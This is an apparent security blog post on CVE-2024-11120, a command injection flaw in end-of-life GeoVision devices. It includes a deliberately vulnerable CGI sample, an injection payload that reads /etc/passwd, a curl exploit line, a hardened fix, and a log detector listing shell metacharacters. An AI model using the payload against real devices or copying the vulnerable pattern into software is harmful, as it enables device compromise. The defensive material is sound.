GeoVision, known globally for its video surveillance products, has left a critical vulnerability in some of its End-of-Life (EOL) devices. This flaw, identified as CVE-2024-11120, allows unauthenticated attackers to execute arbitrary system commands remotely—no login required.

In this post, I’ll break down what this vulnerability is, how it’s exploited, and what you should do if you have one of these devices. I'll keep it clear and straightforward, with code snippets and references so you get all the facts.

What Is CVE-2024-11120?

CVE-2024-11120 is a high-severity OS command injection vulnerability found in legacy GeoVision network devices. These products are no longer supported (“EOL”) and do not receive security patches—even for critical issues.

Attackers can send specially crafted HTTP requests to vulnerable devices to run arbitrary system commands. This can lead to full compromise: attackers can add users, install malware, eavesdrop on communications, and more.

Important: This flaw requires no authentication; anyone on the network (or sometimes the internet) can exploit it.

Vulnerable Products

While GeoVision has not published an exhaustive list, reports and security researchers indicate the following product lines are affected:

Some NVR (Network Video Recorder) appliances

If your device reached end-of-life prior to 2024—and it runs a web management interface—you should assume it’s affected.

Exploit Details and Sample Code

Attackers can exploit this bug by sending a specially crafted POST request to a CGI script running on the device. User-supplied data in one of the parameters is insufficiently sanitized and passed directly to the system shell.

For example, let's say /cgi-bin/some_feature.cgi accepts a parameter called user. The vulnerable code might look like this (hypothetical, based on common Python CGI backends):

# Hypothetical vulnerable CGI script
import os, cgi

form = cgi.FieldStorage()
user = form.getvalue('user')          # attacker-controlled request parameter
os.system(f'ping -c 4 {user}')        # interpolated straight into a shell command line: no validation, no quoting

The attacker could submit

user=;id;cat /etc/passwd;

This would cause the device to execute ping -c 4 ;id;cat /etc/passwd;, running both id and cat /etc/passwd—and returning results to the attacker.

Let's use curl (a command-line HTTP client) to exploit a vulnerable device at 192.168.1.100:

curl -X POST "http://192.168.1.100/cgi-bin/some_feature.cgi" -d "user=;id"

If successful, the device's web response would include the output of the id command, showing you have command execution.
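For contrast, here is what a hardened version of that hypothetical handler looks like. This is an added example written for this post, not GeoVision's code and not the script above: it assumes the same single "user" parameter and the same ping use case, and fixes the two root causes at once, an allow-list check on the value and a shell-free invocation where the target is one argv element rather than part of a command string.

```python
# Added example (not the page's or GeoVision's code): a shell-free, allow-listed
# replacement for the hypothetical "ping -c 4 {user}" CGI handler above.
import ipaddress
import re
import subprocess

# Conservative DNS-label grammar: letters, digits, hyphens; no leading/trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def is_valid_target(value: str) -> bool:
    """Allow-list check: accept only an IP literal or a plain DNS hostname.

    Everything the injection payload relies on (';', '|', spaces, '/', '$')
    falls outside this grammar, so it never reaches a command line.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)  # IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(target: str) -> list[str]:
    """Build the argument vector for ping. Raises ValueError on rejected input.

    The target is a single argv element and no shell parses it, so even if
    validation were bypassed, ';' would be handed to ping as part of the
    hostname rather than starting a second command.
    """
    if not is_valid_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "4", target]


def run_ping(target: str, timeout: float = 15.0) -> subprocess.CompletedProcess:
    """Execute ping without a shell (a list argv means shell=False)."""
    return subprocess.run(
        build_ping_argv(target),
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,
    )


if __name__ == "__main__":
    # The page's sample payload is rejected before any process is spawned.
    for candidate in ["192.168.1.100", "nvr.example.internal", ";id;cat /etc/passwd;"]:
        try:
            print(candidate, "->", build_ping_argv(candidate))
        except ValueError as exc:
            print(candidate, "->", exc)
```

The two defences are independent on purpose: the allow-list stops hostile input at the edge, and the list-form subprocess call removes the shell entirely, so a gap in one does not re-open command execution. On EOL firmware you cannot apply this fix yourself, which is why the advice later in the post is to isolate or replace the device rather than rely on a workaround.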

Jack into camera feeds

Attackers commonly scan the internet for these device types and exploit them within minutes of discovery.
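If the device's web server (or a reverse proxy in front of it) writes Common Log Format access logs, attempts like the one shown earlier leave a recognisable trace: requests to /cgi-bin/ whose parameters carry shell metacharacters, often percent-encoded. The detector below is an added example for this post, not a GeoVision tool; the log lines it runs over are constructed to match the hypothetical /cgi-bin/some_feature.cgi endpoint and the sample payload from above, and it does its own query-string decoding rather than relying on urllib.parse.parse_qs so that an unencoded ";" is inspected instead of being treated as a parameter separator.

```python
# Added example (not the page's or GeoVision's code): flag CGI requests whose
# decoded parameters contain shell metacharacters, run over constructed log lines.
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access log (Common Log Format). Addresses are documentation
# ranges; the second and third lines mirror the payload discussed in the post.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [15/Nov/2024:02:20:11 +0000] "GET /cgi-bin/some_feature.cgi?user=192.168.1.50 HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Nov/2024:02:20:14 +0000] "POST /cgi-bin/some_feature.cgi?user=%3Bid%3Bcat%20/etc/passwd%3B HTTP/1.1" 200 1024',
    '198.51.100.9 - - [15/Nov/2024:02:21:02 +0000] "GET /cgi-bin/some_feature.cgi?user=$(id) HTTP/1.1" 200 640',
    '192.0.2.5 - - [15/Nov/2024:02:21:30 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Tokens that only make sense if the value is going to be parsed by a shell.
METACHARS = {
    ";": "command separator",
    "|": "pipe",
    "&": "background/and",
    "`": "backtick substitution",
    "$(": "command substitution",
    "\n": "newline",
}


def _decode_params(query: str) -> list[tuple[str, str]]:
    """Split on '&' and percent-decode each side; ';' is kept as data, not as a separator."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def find_injection_attempts(lines: list[str], cgi_prefix: str = "/cgi-bin/") -> list[dict]:
    """Return one record per CGI parameter whose decoded value carries shell metacharacters."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not CLF, skip rather than guess
        parts = urlsplit(match["target"])
        if not parts.path.startswith(cgi_prefix):
            continue
        for key, value in _decode_params(parts.query):
            indicators = [name for token, name in METACHARS.items() if token in value]
            if indicators:
                hits.append({
                    "src": match["src"],
                    "timestamp": match["ts"],
                    "method": match["method"],
                    "path": parts.path,
                    "param": key,
                    "value": value,
                    "indicators": indicators,
                })
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG_LINES):
        print(f'{hit["src"]} {hit["method"]} {hit["path"]} {hit["param"]}={hit["value"]!r} -> {hit["indicators"]}')
```

This flags on syntax, not on success: a 200 response with an unusually large body, as in the second sample line, is the follow-up signal that the command actually ran. POST bodies are normally absent from access logs, so for that method the same check has to run on a proxy or WAF that records request bodies, and any hit against an EOL device should be treated as a compromise indicator, not a blocked attempt.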

References

- NVD CVE-2024-11120 Entry
- GeoVision EOL Policy *(Note: GeoVision is unlikely to issue a patch or bulletin for EOL devices.)*
- Original Research by Orange Cyberdefense *(Translation needed for some readers.)*

Conclusion

CVE-2024-11120 is a textbook example of the risks posed by unpatched, unsupported network devices. The exploit is trivial and widely used in the wild.

If you see a GeoVision device on your network with web access, assume it’s *already* compromised. Take steps quickly to isolate or replace it, and spread the word—these “zombie” endpoints are now part of attackers’ toolkits.

Stay safe, and always keep an inventory of your IoT/OT devices and keep them up to date or isolated!

Exclusive for this post

Should you need help triaging vulnerable GeoVision devices, I recommend network segmentation or retire-and-replace—do not trust workarounds for unauthenticated command injection in EOL gear.

Let me know in the comments if you have questions or want to share your own experience with legacy device risks!

Timeline

Published on: 11/15/2024 02:15:17 UTC
Last modified on: 12/05/2024 15:30:58 UTC